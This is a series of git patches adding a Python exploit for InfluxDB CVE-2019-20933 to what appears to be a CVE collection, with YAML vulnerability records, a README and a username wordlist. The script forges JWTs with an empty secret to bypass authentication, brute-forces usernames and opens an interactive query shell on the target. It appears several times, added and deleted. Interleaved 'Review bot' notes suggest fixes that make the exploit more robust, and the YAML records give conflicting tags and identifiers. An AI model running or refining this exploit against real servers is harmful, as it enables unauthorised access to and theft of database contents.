@@ -0,0 +1,185 @@ +#!/bin/env python + +import json +import pathlib +import time +import urllib +import requests as requests +import jwt +from termcolor import colored + +def bruteforceUser(filename, host, port): + print() + print("Bruteforcing usernames ...") + with open(filename) as f: + for line in f: + line = line.replace("\n", "") + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 + # Generation JWT + payload = { + "username": line, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + if "error" in response.keys(): + if "signature is invalid" in response['error']: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: " + response['error'] + "", "red")) + exit(1) + if "user not found" in response['error']: + print("[{}] {}".format(colored("x", "red"), line)) + else: + print("[{}] {}".format(colored("v", "green"), line)) + print() + username = line + return username + + print(colored("ERROR: no valid username found !!!", "red")) + exit(1) + +def makeQuery(token, db, host, port, query): + try: + headers = { + 'Authorization': 'Bearer ' + token, + } + except: + token = token.decode("utf-8") + headers = { + 'Authorization': 'Bearer ' + token, + } + + # Send request + query = urllib.parse.quote_plus(query) + response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) + return response.text + +def exploit(): + # imput data + print() + try: + host = input("Host (default: localhost): ") + except KeyboardInterrupt: + return + + if host == "": + host = "127.0.0.1" + + try: + port = input("Port (default: 8086): ") + except KeyboardInterrupt: + return + if port == "": + port = 8086 + + try: + username = input("Username path to username file (default: users.txt): ") + except KeyboardInterrupt: + return + + if username == "": + username = "users.txt" + + 
# check if username is a valid file to start bruteforce + file = pathlib.Path(username) + if file.exists(): + username = bruteforceUser(username, host, port) + + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese + + # Generation JWT + payload = { + "username": username, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + #print("Token: {}".format(token)) + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + + if "results" in response.keys(): + print(colored("Host vulnerable !!!", "green")) + else: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: "+response['error']+"", "red")) + return + + # Get databases list + dblist = [db[0] for db in response['results'][0]['series'][0]['values']] + + while True: + print() + print("Databases:") + print() + for (i, db) in enumerate(dblist): + print("{}) {}".format(i + 1, db)) + + print() + print(".quit to exit") + + + try: + db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) + except KeyboardInterrupt: + print() + print("~ Bye!") + break + + try: + db = dblist[int(db) - 1] + except IndexError as e: + # Prompt again if database index if not in range + continue + except Exception as e: + # Check if database exists if its a string + if db.strip() == "": + continue + if db not in dblist: + print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") + continue + pass + + if db in ['.exit', '.quit', '.back']: + return + if db == "": + continue + + print() + print("Starting InfluxDB shell - .back to go back") + while True: + try: + query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) + except KeyboardInterrupt: + break + + if query.strip() == "": + continue + + if query in ['.exit', '.quit', '.back']: + break + + response = makeQuery(token, db, host, port, query) + 
response = json.loads(response) + print(json.dumps(response, indent=4, sort_keys=True)) + + +if __name__ == '__main__': + print(colored(""" + _____ __ _ _____ ____ ______ _ _ _ + |_ _| / _| | | __ \| _ \ | ____| | | (_) | + | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ + | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| + _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ + |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| + | | + |_| """, 'green')) + print(colored(" - using CVE-2019-20933", "yellow")) + + exploit() diff --git a/cve/InfluxDB/CVE-2019-20933/requirements.txt b/cve/InfluxDB/CVE-2019-20933/requirements.txt new file mode 100644 index 00000000..a345330c --- /dev/null +++ b/cve/InfluxDB/CVE-2019-20933/requirements.txt @@ -0,0 +1,4 @@ +urllib3 +requests +PyJWT +termcolor diff --git a/cve/InfluxDB/CVE-2019-20933/users.txt b/cve/InfluxDB/CVE-2019-20933/users.txt new file mode 100644 index 00000000..802b77da --- /dev/null +++ b/cve/InfluxDB/CVE-2019-20933/users.txt @@ -0,0 +1,7 @@ +admin +user +root +database +db +influx +influxdb -- Gitee From ecc3278d5f09ca1423ef5bbf573a9720b45b03df Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:37:42 +0000 Subject: [PATCH 16/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/CVE-2019-20933/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/CVE-2019-20933/.keep diff --git a/cve/InfluxDB/CVE-2019-20933/.keep b/cve/InfluxDB/CVE-2019-20933/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 7d3dce5ae7d04cb1e3192e50e2d3a2ae953e1fd7 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:38:03 +0000 Subject: [PATCH 17/40] CVE-2019-20933 yaml 
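Review bot: The `if db in ['.exit', '.quit', '.back']: return` check in `exploit()` is unreachable: `int(".quit")` raises ValueError, the broad `except Exception` branch then reaches `db not in dblist`, prints "No such database" and continues, so the ".quit to exit" promised by the prompt never exits the database loop. Move that membership test ahead of the `try: db = dblist[int(db) - 1]` block and narrow the handler to `except ValueError:` so only non-numeric input is treated as a name. In `makeQuery`, `db` is concatenated into the URL unencoded while `query` is quoted, and `import urllib` by itself does not bind `urllib.parse` (it only works here because requests imports it first); `requests.get('http://' + host + ':' + str(port) + '/query', params={'db': db, 'q': query}, headers=headers, timeout=10)` encodes both parameters and also supplies the missing timeout, without which an unresponsive host hangs the prompt indefinitely, and the `json.loads` that follows should catch `json.JSONDecodeError` for non-JSON replies. The same file is added verbatim again in PATCH 25 (cve/InfluxDB/2019/__main__.py) and PATCH 30 (cve/InfluxDB/2019/CVE-2019-20933/__main__.py), so whichever copy survives the series needs the same fixes; note also that requirements.txt pins no versions even though the bytes/str branch in `makeQuery` exists only to cope with differing PyJWT releases.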
Signed-off-by: Zentung0628 --- cve/InfluxDB/yaml/CVE-2019-20933.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/InfluxDB/yaml/CVE-2019-20933.yaml diff --git a/cve/InfluxDB/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/yaml/CVE-2019-20933.yaml new file mode 100644 index 00000000..ec29dcb4 --- /dev/null +++ b/cve/InfluxDB/yaml/CVE-2019-20933.yaml @@ -0,0 +1,19 @@ +id: 2019-20933 +source: +info: + name: InfluxDB是一个开源的分布式时序数据库,主要用于存储和查询时间序列数据 + severity: critical + description: | + 利用 InfluxDB CVE-2019-20933 漏洞,InfluxDB 1.7.6 之前的 services/httpd/handler.go 中的 authenticate 函数存在身份验证绕过漏洞,因为 JWT token 可能有一个空的 SharedSecret(又名共享秘密)。 利用检查服务器是否易受攻击,然后它会尝试获取远程查询 shell。 它内置了用户名暴力破解服务。 + scope-of-influence: +InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9 + cve-id: CVE-2019-20933 + cwe-id: CWE-78 + cnvd-id: CNVD-2020-03627 + kve-id: KVE-2019-1372 + tags: RCE,cve2019,任意文件读取 \ No newline at end of file -- Gitee From e148cbce6b1e926850e086eead7a280bed8a9e78 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:38:08 +0000 Subject: [PATCH 18/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/yaml/.keep diff --git a/cve/InfluxDB/yaml/.keep b/cve/InfluxDB/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 21436807f90c22e8915de98c02b460f1bd701cfb Mon Sep 17 00:00:00 2001 
From: Zentung0628 Date: Wed, 15 Mar 2023 04:21:08 +0000 Subject: [PATCH 19/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/yaml/CVE-2019-20933.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/CVE-2019-20933.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 cve/InfluxDB/yaml/CVE-2019-20933.yaml diff --git a/cve/InfluxDB/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/yaml/CVE-2019-20933.yaml deleted file mode 100644 index ec29dcb4..00000000 --- a/cve/InfluxDB/yaml/CVE-2019-20933.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: 2019-20933 -source: -info: - name: InfluxDB是一个开源的分布式时序数据库,主要用于存储和查询时间序列数据 - severity: critical - description: | - 利用 InfluxDB CVE-2019-20933 漏洞,InfluxDB 1.7.6 之前的 services/httpd/handler.go 中的 authenticate 函数存在身份验证绕过漏洞,因为 JWT token 可能有一个空的 SharedSecret(又名共享秘密)。 利用检查服务器是否易受攻击,然后它会尝试获取远程查询 shell。 它内置了用户名暴力破解服务。 - scope-of-influence: -InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9 - cve-id: CVE-2019-20933 - cwe-id: CWE-78 - cnvd-id: CNVD-2020-03627 - kve-id: KVE-2019-1372 - tags: RCE,cve2019,任意文件读取 \ No newline at end of file -- Gitee From 99b7a305468a1c4f483ec5bf45ef8b5942addad1 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 04:21:34 +0000 Subject: [PATCH 20/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/yaml/.keep diff --git a/cve/InfluxDB/yaml/.keep b/cve/InfluxDB/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 5bb5a09440e25b655eaa2f3017a48339d6a805b9 Mon Sep 17 00:00:00 2001 
From: Zentung0628 Date: Wed, 15 Mar 2023 04:21:56 +0000 Subject: [PATCH 21/40] CVE-2019-20933 yaml Signed-off-by: Zentung0628 --- cve/InfluxDB/yaml/CVE-2019-20933.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/InfluxDB/yaml/CVE-2019-20933.yaml diff --git a/cve/InfluxDB/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/yaml/CVE-2019-20933.yaml new file mode 100644 index 00000000..6a0ff454 --- /dev/null +++ b/cve/InfluxDB/yaml/CVE-2019-20933.yaml @@ -0,0 +1,19 @@ +id: CVE-2019-20933 +source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 +info: + name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 + severity: critical + description: | + InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). + scope-of-influence: + InfluxData InfluxDB <1.7.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-20933 + cwe-id: CWE-287 + cnvd-id: CNVD-2022-06547 + kve-id: None + tags: RCE, cve2019, 任意文件读取 \ No newline at end of file -- Gitee From 3931eb113a3056b10049f2e35cc65452daa0dde5 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 04:22:02 +0000 Subject: [PATCH 22/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/yaml/.keep diff --git a/cve/InfluxDB/yaml/.keep b/cve/InfluxDB/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 092431896b1d94fb652a52a62986a6a9b4efa7fb Mon Sep 17 00:00:00 2001 
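Review bot: The `tags: RCE, cve2019, 任意文件读取` line contradicts the rest of this record: `cwe-id` is CWE-287 (improper authentication), `description` states an authentication bypass, and the bundled script only obtains an authenticated query session, not code execution or file read. A consistent value would be along the lines of `tags: auth-bypass, cve2019, influxdb`, using whatever tag vocabulary the repository already applies elsewhere. `kve-id: None` is the YAML string "None" rather than a null; if consumers check for an absent identifier, `kve-id:` with an empty value (or `~`) is the idiomatic form. The `name` field holds a full sentence describing the flaw while `description` repeats the same content in English, so one of them could carry a short product name instead.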
From: Zentung0628 Date: Wed, 15 Mar 2023 05:45:42 +0000 Subject: [PATCH 23/40] update cve/InfluxDB/yaml/CVE-2019-20933.yaml. Signed-off-by: Zentung0628 --- cve/InfluxDB/yaml/CVE-2019-20933.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/InfluxDB/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/yaml/CVE-2019-20933.yaml index 6a0ff454..7902e771 100644 --- a/cve/InfluxDB/yaml/CVE-2019-20933.yaml +++ b/cve/InfluxDB/yaml/CVE-2019-20933.yaml @@ -6,7 +6,7 @@ info: description: | InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). scope-of-influence: - InfluxData InfluxDB <1.7.6 + InfluxData InfluxDB <1.7.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 classification: -- Gitee From cc3c0183c86438323f657343d3e7c4c622633326 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:46:06 +0000 Subject: [PATCH 24/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/2019/.keep diff --git a/cve/InfluxDB/2019/.keep b/cve/InfluxDB/2019/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From e44772af56809b9d31e9f0d0250b24f296a3a49a Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:47:15 +0000 Subject: [PATCH 25/40] CVE-2019-20933 Signed-off-by: Zentung0628 --- cve/InfluxDB/2019/README.md | 16 +++ cve/InfluxDB/2019/__main__.py | 185 +++++++++++++++++++++++++++++ cve/InfluxDB/2019/requirements.txt | 4 + cve/InfluxDB/2019/users.txt | 7 ++ 4 files changed, 212 insertions(+) create mode 100644 cve/InfluxDB/2019/README.md create mode 100644 cve/InfluxDB/2019/__main__.py create mode 100644 cve/InfluxDB/2019/requirements.txt create mode 100644 cve/InfluxDB/2019/users.txt 
diff --git a/cve/InfluxDB/2019/README.md b/cve/InfluxDB/2019/README.md new file mode 100644 index 00000000..dad0665f --- /dev/null +++ b/cve/InfluxDB/2019/README.md @@ -0,0 +1,16 @@ +# InfluxDB Exploit CVE-2019-20933 + +Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). +Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. + +## Installation +``` +git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git +cd InfluxDB-Exploit-CVE-2019-20933 +pip install -r requirements.txt +``` + +## Usage +``` +python __main__.py +``` diff --git a/cve/InfluxDB/2019/__main__.py b/cve/InfluxDB/2019/__main__.py new file mode 100644 index 00000000..e38d12f4 --- /dev/null +++ b/cve/InfluxDB/2019/__main__.py 
@@ -0,0 +1,185 @@ +#!/bin/env python + +import json +import pathlib +import time +import urllib +import requests as requests +import jwt +from termcolor import colored + +def bruteforceUser(filename, host, port): + print() + print("Bruteforcing usernames ...") + with open(filename) as f: + for line in f: + line = line.replace("\n", "") + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 + # Generation JWT + payload = { + "username": line, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + if "error" in response.keys(): + if "signature is invalid" in response['error']: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: " + response['error'] + "", "red")) + exit(1) + if "user not found" in response['error']: + print("[{}] {}".format(colored("x", "red"), line)) + else: + print("[{}] {}".format(colored("v", "green"), line)) + print() + username = line + return username + + print(colored("ERROR: no valid username found !!!", "red")) + exit(1) + +def makeQuery(token, db, host, port, query): + try: + headers = { + 'Authorization': 'Bearer ' + token, + } + except: + token = token.decode("utf-8") + headers = { + 'Authorization': 'Bearer ' + token, + } + + # Send request + query = urllib.parse.quote_plus(query) + response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) + return response.text + +def exploit(): + # imput data + print() + try: + host = input("Host (default: localhost): ") + except KeyboardInterrupt: + return + + if host == "": + host = "127.0.0.1" + + try: + port = input("Port (default: 8086): ") + except KeyboardInterrupt: + return + if port == "": + port = 8086 + + try: + username = input("Username path to username file (default: users.txt): ") + except KeyboardInterrupt: + return + + if username == "": + username = "users.txt" + + 
# check if username is a valid file to start bruteforce + file = pathlib.Path(username) + if file.exists(): + username = bruteforceUser(username, host, port) + + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese + + # Generation JWT + payload = { + "username": username, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + #print("Token: {}".format(token)) + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + + if "results" in response.keys(): + print(colored("Host vulnerable !!!", "green")) + else: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: "+response['error']+"", "red")) + return + + # Get databases list + dblist = [db[0] for db in response['results'][0]['series'][0]['values']] + + while True: + print() + print("Databases:") + print() + for (i, db) in enumerate(dblist): + print("{}) {}".format(i + 1, db)) + + print() + print(".quit to exit") + + + try: + db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) + except KeyboardInterrupt: + print() + print("~ Bye!") + break + + try: + db = dblist[int(db) - 1] + except IndexError as e: + # Prompt again if database index if not in range + continue + except Exception as e: + # Check if database exists if its a string + if db.strip() == "": + continue + if db not in dblist: + print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") + continue + pass + + if db in ['.exit', '.quit', '.back']: + return + if db == "": + continue + + print() + print("Starting InfluxDB shell - .back to go back") + while True: + try: + query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) + except KeyboardInterrupt: + break + + if query.strip() == "": + continue + + if query in ['.exit', '.quit', '.back']: + break + + response = makeQuery(token, db, host, port, query) + 
response = json.loads(response) + print(json.dumps(response, indent=4, sort_keys=True)) + + +if __name__ == '__main__': + print(colored(""" + _____ __ _ _____ ____ ______ _ _ _ + |_ _| / _| | | __ \| _ \ | ____| | | (_) | + | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ + | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| + _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ + |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| + | | + |_| """, 'green')) + print(colored(" - using CVE-2019-20933", "yellow")) + + exploit() diff --git a/cve/InfluxDB/2019/requirements.txt b/cve/InfluxDB/2019/requirements.txt new file mode 100644 index 00000000..a345330c --- /dev/null +++ b/cve/InfluxDB/2019/requirements.txt @@ -0,0 +1,4 @@ +urllib3 +requests +PyJWT +termcolor diff --git a/cve/InfluxDB/2019/users.txt b/cve/InfluxDB/2019/users.txt new file mode 100644 index 00000000..802b77da --- /dev/null +++ b/cve/InfluxDB/2019/users.txt @@ -0,0 +1,7 @@ +admin +user +root +database +db +influx +influxdb -- Gitee From fc124b40e4975c46b41385feb502bc22e1ab9be0 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:47:21 +0000 Subject: [PATCH 26/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/2019/.keep diff --git a/cve/InfluxDB/2019/.keep b/cve/InfluxDB/2019/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 996687c6488008377a0044cf92e5f273761827a2 Mon Sep 17 00:00:00 2001 
From: Zentung0628 Date: Wed, 15 Mar 2023 05:47:37 +0000 Subject: [PATCH 27/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/2019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/README.md | 16 --- cve/InfluxDB/2019/__main__.py | 185 ----------------------------- cve/InfluxDB/2019/requirements.txt | 4 - cve/InfluxDB/2019/users.txt | 7 -- 4 files changed, 212 deletions(-) delete mode 100644 cve/InfluxDB/2019/README.md delete mode 100644 cve/InfluxDB/2019/__main__.py delete mode 100644 cve/InfluxDB/2019/requirements.txt delete mode 100644 cve/InfluxDB/2019/users.txt diff --git a/cve/InfluxDB/2019/README.md b/cve/InfluxDB/2019/README.md deleted file mode 100644 index dad0665f..00000000 --- a/cve/InfluxDB/2019/README.md +++ /dev/null @@ -1,16 +0,0 @@ -# InfluxDB Exploit CVE-2019-20933 - -Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). -Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. - -## Installation -``` -git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git -cd InfluxDB-Exploit-CVE-2019-20933 -pip install -r requirements.txt -``` - -## Usage -``` -python __main__.py -``` diff --git a/cve/InfluxDB/2019/__main__.py b/cve/InfluxDB/2019/__main__.py deleted file mode 100644 index e38d12f4..00000000 --- a/cve/InfluxDB/2019/__main__.py +++ /dev/null 
@@ -1,185 +0,0 @@ -#!/bin/env python - -import json -import pathlib -import time -import urllib -import requests as requests -import jwt -from termcolor import colored - -def bruteforceUser(filename, host, port): - print() - print("Bruteforcing usernames ...") - with open(filename) as f: - for line in f: - line = line.replace("\n", "") - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 - # Generation JWT - payload = { - "username": line, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - if "error" in response.keys(): - if "signature is invalid" in response['error']: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: " + response['error'] + "", "red")) - exit(1) - if "user not found" in response['error']: - print("[{}] {}".format(colored("x", "red"), line)) - else: - print("[{}] {}".format(colored("v", "green"), line)) - print() - username = line - return username - - print(colored("ERROR: no valid username found !!!", "red")) - exit(1) - -def makeQuery(token, db, host, port, query): - try: - headers = { - 'Authorization': 'Bearer ' + token, - } - except: - token = token.decode("utf-8") - headers = { - 'Authorization': 'Bearer ' + token, - } - - # Send request - query = urllib.parse.quote_plus(query) - response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) - return response.text - -def exploit(): - # imput data - print() - try: - host = input("Host (default: localhost): ") - except KeyboardInterrupt: - return - - if host == "": - host = "127.0.0.1" - - try: - port = input("Port (default: 8086): ") - except KeyboardInterrupt: - return - if port == "": - port = 8086 - - try: - username = input("Username path to username file (default: users.txt): ") - except KeyboardInterrupt: - return - - if username == "": - username = "users.txt" - - 
# check if username is a valid file to start bruteforce - file = pathlib.Path(username) - if file.exists(): - username = bruteforceUser(username, host, port) - - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese - - # Generation JWT - payload = { - "username": username, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - #print("Token: {}".format(token)) - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - - if "results" in response.keys(): - print(colored("Host vulnerable !!!", "green")) - else: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: "+response['error']+"", "red")) - return - - # Get databases list - dblist = [db[0] for db in response['results'][0]['series'][0]['values']] - - while True: - print() - print("Databases:") - print() - for (i, db) in enumerate(dblist): - print("{}) {}".format(i + 1, db)) - - print() - print(".quit to exit") - - - try: - db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) - except KeyboardInterrupt: - print() - print("~ Bye!") - break - - try: - db = dblist[int(db) - 1] - except IndexError as e: - # Prompt again if database index if not in range - continue - except Exception as e: - # Check if database exists if its a string - if db.strip() == "": - continue - if db not in dblist: - print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") - continue - pass - - if db in ['.exit', '.quit', '.back']: - return - if db == "": - continue - - print() - print("Starting InfluxDB shell - .back to go back") - while True: - try: - query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) - except KeyboardInterrupt: - break - - if query.strip() == "": - continue - - if query in ['.exit', '.quit', '.back']: - break - - response = makeQuery(token, db, host, port, query) - 
response = json.loads(response) - print(json.dumps(response, indent=4, sort_keys=True)) - - -if __name__ == '__main__': - print(colored(""" - _____ __ _ _____ ____ ______ _ _ _ - |_ _| / _| | | __ \| _ \ | ____| | | (_) | - | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ - | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| - _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ - |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| - | | - |_| """, 'green')) - print(colored(" - using CVE-2019-20933", "yellow")) - - exploit() diff --git a/cve/InfluxDB/2019/requirements.txt b/cve/InfluxDB/2019/requirements.txt deleted file mode 100644 index a345330c..00000000 --- a/cve/InfluxDB/2019/requirements.txt +++ /dev/null @@ -1,4 +0,0 @@ -urllib3 -requests -PyJWT -termcolor diff --git a/cve/InfluxDB/2019/users.txt b/cve/InfluxDB/2019/users.txt deleted file mode 100644 index 802b77da..00000000 --- a/cve/InfluxDB/2019/users.txt +++ /dev/null @@ -1,7 +0,0 @@ -admin -user -root -database -db -influx -influxdb -- Gitee From b2c421c027b241d521cabf1705f1a7e8c68c4111 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:47:54 +0000 Subject: [PATCH 28/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/2019/.keep diff --git a/cve/InfluxDB/2019/.keep b/cve/InfluxDB/2019/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From dde920153b2f631363584301242826e6981c5a08 Mon Sep 17 00:00:00 2001 
